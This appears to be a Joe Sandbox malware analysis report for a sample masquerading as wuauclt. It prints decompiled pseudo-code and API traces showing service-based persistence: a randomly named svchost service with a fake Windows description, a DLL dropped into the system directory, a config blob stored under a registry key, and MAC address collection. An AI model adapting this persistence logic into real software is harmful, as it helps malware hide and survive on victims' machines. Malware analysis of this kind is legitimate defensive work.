                                                						} else {
                                                							__imp__CryptHashData(_v8, _a4, _a8, 0);
                                                							if(_t20 == 0) {
                                                								goto L1;
                                                							} else {
                                                								__imp__CryptVerifySignatureA(_v8, _a12, _a16, _v16, 0, 0, _t24); // executed
                                                								_t21 = _v8;
                                                								_t27 =  !=  ? 1 : 0;
                                                								if(_t21 != 0) {
                                                									__imp__CryptDestroyHash(_t21);
                                                								}
                                                								_t30 = _v12;
                                                								if(_t30 != 0) {
                                                									CryptReleaseContext(_t30, 0);
                                                								}
                                                								return _t27;
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					L1:
                                                					return 0;
                                                				}
                                                			}














                                                APIs
                                                • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 002546F5
                                                • CryptImportKey.ADVAPI32(?,00272BA0,00000094,00000000,00000000,?), ref: 0025471A
                                                • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00254734
                                                • CryptHashData.ADVAPI32(?,?,?,00000000), ref: 00254749
                                                • CryptVerifySignatureA.ADVAPI32(?,?,00000000,?,00000000,00000000), ref: 00254766
                                                • CryptDestroyHash.ADVAPI32(?), ref: 00254781
                                                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00254791
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyImportReleaseSignatureVerify
                                                • String ID:
                                                • API String ID: 949692108-0
                                                • Opcode ID: 8566db5b7871a37c41d58dad6130fa72b85a3e1b2244ddd9410de485442c9289
                                                • Instruction ID: 8ec8519f1c283c5ff9e7a6ed434f514114ce8f4cf913bbfd3bf2eee89237ef71
                                                • Opcode Fuzzy Hash: 8566db5b7871a37c41d58dad6130fa72b85a3e1b2244ddd9410de485442c9289
                                                • Instruction Fuzzy Hash: 9F214F3578020ABBEF209FA0EC49FA9BB7CAB05B05F104054FE04E50D0DBB19AA49A18
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 100%
                                                			E00257040(char* __ecx, void* __eflags, intOrPtr _a4, char _a8) {
                                                				void* __ebx;
                                                				void* __esi;
                                                				void* _t4;
                                                				void* _t5;
                                                				void* _t9;
                                                				void* _t10;
                                                				void* _t12;
                                                				void* _t13;
                                                				char* _t14;
                                                				void* _t15;
                                                
                                                				_t1 =  &_a8; // 0x256b49
                                                				_t14 = __ecx;
                                                				E00256E80(_t9, __ecx, _t12, _t13, __ecx, _a4,  *_t1); // executed
                                                				_t4 = OpenSCManagerA(0, 0, 2);
                                                				_t10 = _t4;
                                                				if(_t10 != 0) {
                                                					_t5 = OpenServiceA(_t10, _t14, 0x10010); // executed
                                                					_t15 = _t5;
                                                					if(_t15 != 0) {
                                                						StartServiceA(_t15, 0, 0);
                                                						CloseServiceHandle(_t15);
                                                					}
                                                					return CloseServiceHandle(_t10);
                                                				}
                                                				return _t4;
                                                			}














                                                APIs
                                                  • Part of subcall function 00256E80: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost,00000000,00000001,?,00000000,?), ref: 00256ED0
                                                  • Part of subcall function 00256E80: RegQueryValueExA.KERNELBASE(80000002,netsvcs,00000000,?,?,?), ref: 00256F09
                                                  • Part of subcall function 00256E80: RegCloseKey.KERNELBASE(80000002), ref: 00256F17
                                                  • Part of subcall function 00256E80: SetLastError.KERNEL32(00000000), ref: 00256F1E
                                                  • Part of subcall function 00256E80: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00256F33
                                                  • Part of subcall function 00256E80: wsprintfA.USER32 ref: 00256F5D
                                                  • Part of subcall function 00256E80: CreateServiceA.ADVAPI32(00000000,?,?,000F01FF,00000010,00000002,00000001,%SystemRoot%\System32\svchost.exe -k netsvcs,00000000,00000000,00000000,00000000,00000000), ref: 00256F84
                                                  • Part of subcall function 00256E80: wsprintfA.USER32 ref: 00256FAF
                                                  • Part of subcall function 00256E80: lstrlenA.KERNEL32(?,00000000,00000000), ref: 00256FC0
                                                  • Part of subcall function 00256E80: lstrcatA.KERNEL32(?,\Parameters), ref: 00256FEA
                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002,?,?), ref: 0025705B
                                                • OpenServiceA.ADVAPI32(00000000,?,00010010), ref: 0025706E
                                                • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 0025707F
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00257086
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0025708D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: Service$Open$Close$HandleManagerwsprintf$CreateErrorLastQueryStartValuelstrcatlstrlen
                                                • String ID: Ik%
                                                • API String ID: 1917720802-1292306806
                                                • Opcode ID: e6ee2f8d3173bb4b1a34333b617d4df0c01ef8d88fce59db7b187833087ed2a0
                                                • Instruction ID: ffd3a9ac7afeac31520573d12c9ec0976801b423dac3a6ce16e1065357ae2595
                                                • Opcode Fuzzy Hash: e6ee2f8d3173bb4b1a34333b617d4df0c01ef8d88fce59db7b187833087ed2a0
                                                • Instruction Fuzzy Hash: 20F0373564531577D7211B60BC4EF9A7A5CDB08762F004010FE0966191DEF1995445A4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • WSAStartup.WS2_32(00000202,?), ref: 00255F96
                                                • GetAdaptersInfo.IPHLPAPI(?,?), ref: 00255FBC
                                                Strings
                                                • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 00256059
                                                • 10:00:00:00:00:01, xrefs: 0025600C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: AdaptersInfoStartup
                                                • String ID: %02X:%02X:%02X:%02X:%02X:%02X$10:00:00:00:00:01
                                                • API String ID: 2017509081-2151411463
                                                • Opcode ID: e7eb4f0af683bc5ccaadd38f052d17114ab498cf190a78f8c4f124b038351f24
                                                • Instruction ID: 6bd4900ad51558a78dfa0f14b7daa819baba4ad8cab90c909a4918ca1baa7f57
                                                • Opcode Fuzzy Hash: e7eb4f0af683bc5ccaadd38f052d17114ab498cf190a78f8c4f124b038351f24
                                                • Instruction Fuzzy Hash: 4F210BB19242985EEF25CB21982DFF53FE89F06315F8800FEFD4C57082DA745AA88B55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0025C90E(int _a4) {
                                                				void* _t14;
                                                				void* _t16;
                                                
                                                				if(E0025D96B(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
                                                					TerminateProcess(GetCurrentProcess(), _a4);
                                                				}
                                                				E0025C993(_t14, _a4);
                                                				ExitProcess(_a4);
                                                			}






                                                APIs
                                                • GetCurrentProcess.KERNEL32(00000003,?,0025C8E4,00000003,0026F9B8,0000000C,0025CA3B,00000003,00000002,00000000,?,0025D3BE,00000003), ref: 0025C92F
                                                • TerminateProcess.KERNEL32(00000000,?,0025C8E4,00000003,0026F9B8,0000000C,0025CA3B,00000003,00000002,00000000,?,0025D3BE,00000003), ref: 0025C936
                                                • ExitProcess.KERNEL32 ref: 0025C948
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: Process$CurrentExitTerminate
                                                • String ID:
                                                • API String ID: 1703294689-0
                                                • Opcode ID: 3c507b5720e5637e77bff7d9f17957df48c873568e385aac2aaa1b5115a34039
                                                • Instruction ID: 740480065c62ff42b8b7f97bdf31e05a87a3ad9e0ec7aa8993577a2a6cdab9fc
                                                • Opcode Fuzzy Hash: 3c507b5720e5637e77bff7d9f17957df48c873568e385aac2aaa1b5115a34039
                                                • Instruction Fuzzy Hash: 77E04631020649AFCF116F20EC0CAA83B29EB12742B608054FC099B122DF76DDA6CB84
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00257AAE() {
                                                				_Unknown_base(*)()* _t1;
                                                
                                                				_t1 = SetUnhandledExceptionFilter(E00257ABA); // executed
                                                				return _t1;
                                                			}





                                                APIs
                                                • SetUnhandledExceptionFilter.KERNELBASE(Function_00007ABA,0025739E), ref: 00257AB3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: a8309b6382e0a48ee82b5042871e8f081551097f36d110dc58dcb313403299f6
                                                • Instruction ID: 82eb52c0154fa8f1a399ceda60a1e87cff3870f89cf6aff5e55707a6b09d15f7
                                                • Opcode Fuzzy Hash: a8309b6382e0a48ee82b5042871e8f081551097f36d110dc58dcb313403299f6
                                                • Instruction Fuzzy Hash:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 38 255180-2551b4 39 2551b6-2551c2 38->39 40 2558a9 39->40 41 2551c8-2551d9 call 254a10 39->41 43 2558ab-2558c6 call 257097 40->43 46 255266-2552ab call 254e30 call 257f02 41->46 47 2551df-2551ff 41->47 57 2552ad-2552b5 call 254cf0 46->57 58 2552ba-255357 call 255110 call 254e30 call 257f02 46->58 50 255200-255245 call 254e30 call 257f02 47->50 62 255254-255264 call 255110 50->62 63 255247-25524f call 254cf0 50->63 57->58 72 255366-2553fe call 255110 call 254e30 call 257f02 58->72 73 255359-255361 call 254cf0 58->73 62->46 62->50 63->62 81 255400-255408 call 254cf0 72->81 82 25540d-2554a5 call 255110 call 254e30 call 257f02 72->82 73->72 81->82 90 2554b4-255597 call 255110 call 2596c0 * 2 call 253d30 * 2 OpenSCManagerA 82->90 91 2554a7-2554af call 254cf0 82->91 103 2555f9-25565e call 2596c0 GetSystemDirectoryA call 2596c0 90->103 104 255599-2555ad OpenServiceA 90->104 91->90 112 255660-2556a5 call 254e30 call 257f02 103->112 105 2555af-2555b6 CloseServiceHandle 104->105 106 2555b8-2555e4 QueryServiceStatusEx CloseServiceHandle * 2 104->106 105->103 106->103 108 2555e6-2555f3 106->108 108->39 108->103 117 2556b4-2556ee call 255110 112->117 118 2556a7-2556af call 254cf0 112->118 117->112 122 2556f4-255780 call 2596c0 * 2 call 253d30 * 2 117->122 118->117 131 255782-25578d 122->131 131->131 132 25578f-25579b 131->132 133 2557a1-2557ac 132->133 133->133 134 2557ae-2557ba 133->134 135 2557c0-2557cb 134->135 135->135 136 2557cd-2557df 135->136 137 2557e0-2557eb 136->137 137->137 138 2557ed-25580d DeleteFileA CreateFileA 137->138 139 255821-25587d call 253d30 RegCreateKeyExA 138->139 140 25580f-25581c CloseHandle 138->140 139->40 143 25587f-2558a1 RegSetValueExA 139->143 140->39 144 2558c7-2558cf RegCloseKey 143->144 145 2558a3 RegCloseKey 143->145 144->43 145->40
                                                C-Code - Quality: 79%
                                                			E00255180(char* __ebx, int __ecx, void* __edi) {
                                                				int _v8;
                                                				char _v16;
                                                				signed int _v20;
                                                				char _v84;
                                                				char _v212;
                                                				char _v340;
                                                				char _v604;
                                                				char _v868;
                                                				char _v1132;
                                                				intOrPtr _v1136;
                                                				int _v1140;
                                                				char _v1156;
                                                				intOrPtr _v1164;
                                                				char _v1168;
                                                				void* _v1172;
                                                				char _v1173;
                                                				char _v1174;
                                                				char _v1175;
                                                				char _v1176;
                                                				char _v1177;
                                                				char _v1178;
                                                				int _v1184;
                                                				signed int _v1188;
                                                				intOrPtr _v1192;
                                                				int _v1196;
                                                				intOrPtr _v1200;
                                                				char _v1204;
                                                				int _v1208;
                                                				intOrPtr _v1212;
                                                				char _v1216;
                                                				int _v1220;
                                                				intOrPtr _v1224;
                                                				char _v1228;
                                                				int _v1232;
                                                				intOrPtr _v1236;
                                                				char _v1240;
                                                				int _v1244;
                                                				intOrPtr _v1248;
                                                				char _v1252;
                                                				int _v1256;
                                                				intOrPtr _v1260;
                                                				char _v1264;
                                                				char _v1268;
                                                				void* __esi;
                                                				void* __ebp;
                                                				signed int _t165;
                                                				signed int _t166;
                                                				intOrPtr _t174;
                                                				void* _t176;
                                                				intOrPtr _t181;
                                                				void* _t184;
                                                				intOrPtr _t187;
                                                				void* _t190;
                                                				void* _t208;
                                                				char _t215;
                                                				char _t239;
                                                				char _t242;
                                                				char _t244;
                                                				char _t247;
                                                				void* _t249;
                                                				int _t255;
                                                				signed int _t256;
                                                				signed int _t266;
                                                				signed int _t287;
                                                				signed int _t289;
                                                				intOrPtr* _t305;
                                                				intOrPtr* _t306;
                                                				intOrPtr* _t307;
                                                				intOrPtr* _t308;
                                                				void* _t312;
                                                				void* _t314;
                                                				void* _t316;
                                                				void* _t318;
                                                				signed int _t321;
                                                				void* _t323;
                                                				void* _t325;
                                                				void* _t326;
                                                				signed int _t327;
                                                				int _t330;
                                                				CHAR* _t331;
                                                				void* _t332;
                                                				signed int _t334;
                                                				void* _t335;
                                                				void* _t336;
                                                				void* _t341;
                                                				void* _t352;
                                                				void* _t354;
                                                				void* _t356;
                                                
                                                				_t319 = __edi;
                                                				_t285 = __ebx;
                                                				_push(0xffffffff);
                                                				_push(E002680A2);
                                                				_push( *[fs:0x0]);
                                                				_t336 = _t335 - 0x4e4;
                                                				_t165 =  *0x271004; // 0x80aab37c
                                                				_t166 = _t165 ^ _t334;
                                                				_v20 = _t166;
                                                				_push(__ebx);
                                                				_push(__edi);
                                                				_push(_t166);
                                                				 *[fs:0x0] =  &_v16;
                                                				_v1184 = __ecx;
                                                				_t289 = 0;
                                                				while(1) {
                                                					_v1192 = _t289 + 1;
                                                					_t346 = _t289 - 0xf;
                                                					if(_t289 > 0xf) {
                                                						break;
                                                					}
                                                					_t295 = 0x14;
                                                					_t326 = E00254A10(_t285, 0x14, 0x64, _t319, _t346);
                                                					_t347 = _t326;
                                                					if(_t326 != 0) {
                                                						_v1200 = 0x20;
                                                						_v1204 =  &_v1173;
                                                						_v1196 = 0xffffffff;
                                                						do {
                                                							_push(0);
                                                							_v1136 = 0xf;
                                                							_v1140 = 0;
                                                							_v1156 = 0;
                                                							E00254E30(_t285,  &_v1156, _t295);
                                                							_v8 = 0;
                                                							E00257F02( &_v1156, _t347);
                                                							_v8 = 0xffffffff;
                                                							_t281 = _v1136;
                                                							if(_v1136 >= 0x10) {
                                                								E00254CF0(_t285, 0x64, _t319, _v1156, _t281 + 1);
                                                							}
                                                							_t295 =  &_v1204;
                                                							E00255110( &_v1204, 0x64);
                                                							_t326 = _t326 - 1;
                                                							_t350 = _t326;
                                                						} while (_t326 != 0);
                                                					}
                                                					_push(0);
                                                					_v1136 = 0xf;
                                                					_v1140 = 0;
                                                					_v1156 = 0;
                                                					E00254E30(_t285,  &_v1156, _t295);
                                                					_v8 = 1;
                                                					E00257F02( &_v1156, _t350);
                                                					_v8 = 0xffffffff;
                                                					_t174 = _v1136;
                                                					if(_t174 >= 0x10) {
                                                						_t352 = _t174 + 1;
                                                						E00254CF0(_t285, 0x64, _t319, _v1156, _t174 + 1);
                                                					}
                                                					_v1136 = 0xf;
                                                					_v1140 = 0;
                                                					_v1156 = 0;
                                                					_v1216 =  &_v1174;
                                                					_v1212 = 0x20;
                                                					_v1208 = 0xffffffff;
                                                					_t176 = E00255110( &_v1216, 5);
                                                					_v1136 = 0xf;
                                                					_push(0);
                                                					_v1140 = 0;
                                                					_v1172 = _t176 + 0xffffffff00000000;
                                                					_v1156 = 0;
                                                					E00254E30(_t285,  &_v1156,  &_v1216);
                                                					_v8 = 2;
                                                					E00257F02( &_v1156, _t352);
                                                					_v8 = 0xffffffff;
                                                					_t181 = _v1136;
                                                					if(_t181 >= 0x10) {
                                                						_t354 = _t181 + 1;
                                                						E00254CF0(_t285, 0x64, _t319, _v1156, _t181 + 1);
                                                					}
                                                					_v1136 = 0xf;
                                                					_v1140 = 0;
                                                					_v1156 = 0;
                                                					_v1228 =  &_v1175;
                                                					_v1224 = 0x20;
                                                					_v1220 = 0xffffffff;
                                                					_t184 = E00255110( &_v1228, 5) + 0x80000000;
                                                					_v1136 = 0xf;
                                                					_push(0);
                                                					_v1140 = 0;
                                                					_t55 = _t184 - 0x80000000; // -4294967296
                                                					_t321 = _t55;
                                                					_v1156 = 0;
                                                					E00254E30(_t285,  &_v1156,  &_v1228);
                                                					_v8 = 3;
                                                					E00257F02( &_v1156, _t354);
                                                					_v8 = 0xffffffff;
                                                					_t187 = _v1136;
                                                					if(_t187 >= 0x10) {
                                                						_t356 = _t187 + 1;
                                                						E00254CF0(_t285, 0x64, _t321, _v1156, _t187 + 1);
                                                					}
                                                					_v1136 = 0xf;
                                                					_v1140 = 0;
                                                					_v1156 = 0;
                                                					_v1240 =  &_v1176;
                                                					_v1236 = 0x20;
                                                					_v1232 = 0xffffffff;
                                                					_t190 = E00255110( &_v1240, 5) + 0x80000000;
                                                					_v1136 = 0xf;
                                                					_push(0);
                                                					_v1140 = 0;
                                                					_t72 = _t190 - 0x80000000; // -4294967296
                                                					_t327 = _t72;
                                                					_v1156 = 0;
                                                					E00254E30(_t285,  &_v1156,  &_v1240);
                                                					_v8 = 4;
                                                					E00257F02( &_v1156, _t356);
                                                					_v8 = 0xffffffff;
                                                					_t193 = _v1136;
                                                					if(_v1136 >= 0x10) {
                                                						E00254CF0(_t285, 0x64, _t321, _v1156, _t193 + 1);
                                                					}
                                                					_v1136 = 0xf;
                                                					_t303 =  &_v1252;
                                                					_v1140 = 0;
                                                					_v1156 = 0;
                                                					_v1252 =  &_v1177;
                                                					_v1248 = 0x20;
                                                					_v1244 = 0xffffffff;
                                                					_v1188 = E00255110( &_v1252, 7) + 0xffffffff00000000;
                                                					E002596C0(_t321,  &_v212, 0, 0x80);
                                                					E002596C0(_t321,  &_v340, 0, 0x80);
                                                					_t90 = (_t327 << 7) + "Event"; // -4292399432
                                                					_t287 = _t90;
                                                					_push(_t287);
                                                					_t323 = "NetBIOS" + (_t321 << 7);
                                                					_push(_t323);
                                                					E00253D30( &_v212, "%s%s%s", "Remote" + (_v1172 << 7));
                                                					_push(_t287);
                                                					_push(_t323);
                                                					E00253D30( &_v340, "%s %s %s", "Remote" + (_v1172 << 7));
                                                					_t336 = _t336 + 0x40;
                                                					_t208 = OpenSCManagerA(0, 0, 4); // executed
                                                					_t319 = _t208;
                                                					if(_t319 == 0) {
                                                						L20:
                                                						E002596C0(_t319,  &_v604, 0, 0x104);
                                                						GetSystemDirectoryA( &_v604, 0x104);
                                                						E002596C0(_t319,  &_v84, 0, 0x40);
                                                						_t215 = "msvc"; // 0x6376736d
                                                						_t341 = _t336 + 0x18;
                                                						_v84 = _t215;
                                                						_t330 = 4;
                                                						_v1260 = 0x20;
                                                						_v1264 =  &_v1178;
                                                						_v1256 = 0xffffffff;
                                                						do {
                                                							_push(0);
                                                							_v1136 = 0xf;
                                                							_v1140 = 0;
                                                							_v1156 = 0;
                                                							E00254E30(_t287,  &_v1156, _t303);
                                                							_v8 = 5;
                                                							E00257F02( &_v1156, _t360);
                                                							_v8 = 0xffffffff;
                                                							_t219 = _v1136;
                                                							if(_v1136 >= 0x10) {
                                                								E00254CF0(_t287, 0x64, _t319, _v1156, _t219 + 1);
                                                							}
                                                							_t303 =  &_v1264;
                                                							_v1136 = 0xf;
                                                							_v1140 = 0;
                                                							_v1156 = 0;
                                                							 *((char*)(_t334 + _t330 - 0x50)) = E00255110( &_v1264, 0x1a) + 0xffffffff00000061;
                                                							_t330 = _t330 + 1;
                                                						} while (_t330 < 7);
                                                						E002596C0(_t319,  &_v868, 0, 0x104);
                                                						E002596C0(_t319,  &_v1132, 0, 0x104);
                                                						_push( &_v212);
                                                						E00253D30( &_v868, "%s\\%s.dll",  &_v604);
                                                						_push("xsl" + (_v1188 << 4));
                                                						_push( &_v84);
                                                						E00253D30( &_v1132, "%s\\%s.%s",  &_v604);
                                                						_t285 = _v1184;
                                                						_t305 =  &_v868;
                                                						_t336 = _t341 + 0x3c;
                                                						_t331 =  &(_t285[0x40]);
                                                						_t312 = _t331 - _t305;
                                                						do {
                                                							_t239 =  *_t305;
                                                							_t305 = _t305 + 1;
                                                							 *((char*)(_t305 + _t312 - 1)) = _t239;
                                                						} while (_t239 != 0);
                                                						_t306 =  &_v1132;
                                                						_t314 = _t285 - _t306 + 0xc0;
                                                						do {
                                                							_t242 =  *_t306;
                                                							_t306 = _t306 + 1;
                                                							 *((char*)(_t306 + _t314 - 1)) = _t242;
                                                						} while (_t242 != 0);
                                                						_t307 =  &_v212;
                                                						_t316 = _t285 - _t307;
                                                						asm("o16 nop [eax+eax]");
                                                						do {
                                                							_t244 =  *_t307;
                                                							_t307 = _t307 + 1;
                                                							 *((char*)(_t307 + _t316 - 1)) = _t244;
                                                						} while (_t244 != 0);
                                                						_t308 =  &_v340;
                                                						_t318 = _t285 - _t308 + 0x140;
                                                						do {
                                                							_t247 =  *_t308;
                                                							_t308 = _t308 + 1;
                                                							 *((char*)(_t308 + _t318 - 1)) = _t247;
                                                						} while (_t247 != 0);
                                                						DeleteFileA(_t331); // executed
                                                						_t249 = CreateFileA(_t331, 0x80000000, 1, 0, 3, 0, 0); // executed
                                                						if(_t249 == 0xffffffff) {
                                                							E00253D30( &(_t285[0x180]), "Provides management services: %s, which confirms the signatures of Windows files and allows new programs to be installed. If this service is stopped, these management services will not function properly. If this service is disabled, any services that explicitly depend on it will fail to start.",  &(_t285[0x140]));
                                                							_v1172 = 0;
                                                							_v1184 = 1;
                                                							_t255 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows NT\\CurrentVersion\\NetworkPlatform\\Location", 0, 0, 0, 0xf003f, 0,  &_v1172,  &_v1184); // executed
                                                							__eflags = _t255;
                                                							if(_t255 != 0) {
                                                								break;
                                                							} else {
                                                								_t256 = RegSetValueExA(_v1172, "LastBackup", _t255, 3, _t285, 0x380); // executed
                                                								_push(_v1172);
                                                								__eflags = _t256;
                                                								if(_t256 == 0) {
                                                									RegCloseKey();
                                                								} else {
                                                									RegCloseKey();
                                                									break;
                                                								}
                                                							}
                                                						} else {
                                                							CloseHandle(_t249);
                                                							_t289 = _v1192;
                                                							continue;
                                                						}
                                                					} else {
                                                						_t332 = OpenServiceA(_t319,  &_v212, 4);
                                                						_t360 = _t332;
                                                						if(_t332 != 0) {
                                                							_t266 =  &_v1168;
                                                							__imp__QueryServiceStatusEx(_t332, 0, _t266, 0x24,  &_v1268);
                                                							__eflags = _t266;
                                                							_t287 = _t287 & 0xffffff00 | _t266 != 0x00000000;
                                                							CloseServiceHandle(_t332);
                                                							CloseServiceHandle(_t319);
                                                							__eflags = _t287;
                                                							if(_t287 == 0) {
                                                								goto L20;
                                                							} else {
                                                								__eflags = _v1164 - 4;
                                                								_t289 = _v1192;
                                                								if(__eflags == 0) {
                                                									continue;
                                                								} else {
                                                									goto L20;
                                                								}
                                                							}
                                                						} else {
                                                							CloseServiceHandle(_t319);
                                                							goto L20;
                                                						}
                                                					}
                                                					L38:
                                                					 *[fs:0x0] = _v16;
                                                					_pop(_t325);
                                                					__eflags = _v20 ^ _t334;
                                                					return E00257097(_v20 ^ _t334, _t325);
                                                				}
                                                				__eflags = 0;
                                                				goto L38;
                                                			}
                                                0x0025547d
                                                0x00255484
                                                0x00255489
                                                0x00255490
                                                0x00255495
                                                0x0025549c
                                                0x002554a5
                                                0x002554af
                                                0x002554af
                                                0x002554ba
                                                0x002554c6
                                                0x002554cc
                                                0x002554d6
                                                0x002554dd
                                                0x002554e3
                                                0x002554ed
                                                0x0025550b
                                                0x0025551a
                                                0x00255530
                                                0x00255547
                                                0x00255547
                                                0x0025554d
                                                0x0025554e
                                                0x0025555a
                                                0x00255568
                                                0x00255576
                                                0x00255577
                                                0x0025557f
                                                0x00255584
                                                0x0025558d
                                                0x00255593
                                                0x00255597
                                                0x002555f9
                                                0x00255607
                                                0x0025561b
                                                0x00255629
                                                0x0025562e
                                                0x00255633
                                                0x00255636
                                                0x00255639
                                                0x00255644
                                                0x0025564e
                                                0x00255654
                                                0x00255660
                                                0x00255660
                                                0x00255669
                                                0x00255673
                                                0x0025567d
                                                0x00255684
                                                0x00255689
                                                0x00255690
                                                0x00255695
                                                0x0025569c
                                                0x002556a5
                                                0x002556af
                                                0x002556af
                                                0x002556b6
                                                0x002556bc
                                                0x002556c6
                                                0x002556d0
                                                0x002556e6
                                                0x002556ea
                                                0x002556eb
                                                0x00255702
                                                0x00255718
                                                0x00255726
                                                0x0025573a
                                                0x0025574d
                                                0x00255751
                                                0x00255765
                                                0x0025576a
                                                0x00255770
                                                0x00255778
                                                0x0025577b
                                                0x00255780
                                                0x00255782
                                                0x00255782
                                                0x00255784
                                                0x00255787
                                                0x0025578b
                                                0x0025578f
                                                0x0025579b
                                                0x002557a1
                                                0x002557a1
                                                0x002557a3
                                                0x002557a6
                                                0x002557aa
                                                0x002557ae
                                                0x002557b8
                                                0x002557ba
                                                0x002557c0
                                                0x002557c0
                                                0x002557c2
                                                0x002557c5
                                                0x002557c9
                                                0x002557cd
                                                0x002557d9
                                                0x002557e0
                                                0x002557e0
                                                0x002557e2
                                                0x002557e5
                                                0x002557e9
                                                0x002557ee
                                                0x00255804
                                                0x0025580d
                                                0x00255834
                                                0x0025583c
                                                0x0025584c
                                                0x00255875
                                                0x0025587b
                                                0x0025587d
                                                0x00000000
                                                0x0025587f
                                                0x00255893
                                                0x00255899
                                                0x0025589f
                                                0x002558a1
                                                0x002558c7
                                                0x002558a3
                                                0x002558a3
                                                0x00000000
                                                0x002558a3
                                                0x002558a1
                                                0x0025580f
                                                0x00255810
                                                0x00255816
                                                0x00000000
                                                0x00255816
                                                0x00255599
                                                0x002555a9
                                                0x002555ab
                                                0x002555ad
                                                0x002555c1
                                                0x002555cb
                                                0x002555d1
                                                0x002555da
                                                0x002555dd
                                                0x002555e0
                                                0x002555e2
                                                0x002555e4
                                                0x00000000
                                                0x002555e6
                                                0x002555e6
                                                0x002555ed
                                                0x002555f3
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002555f3
                                                0x002555af
                                                0x002555b0
                                                0x00000000
                                                0x002555b0
                                                0x002555ad
                                                0x002558ab
                                                0x002558ae
                                                0x002558b7
                                                0x002558bc
                                                0x002558c6
                                                0x002558c6
                                                0x002558a9
                                                0x00000000

                                                APIs
                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004), ref: 0025558D
                                                • OpenServiceA.ADVAPI32(00000000,?,00000004), ref: 002555A3
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 002555B0
                                                • QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,?), ref: 002555CB
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 002555DD
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 002555E0
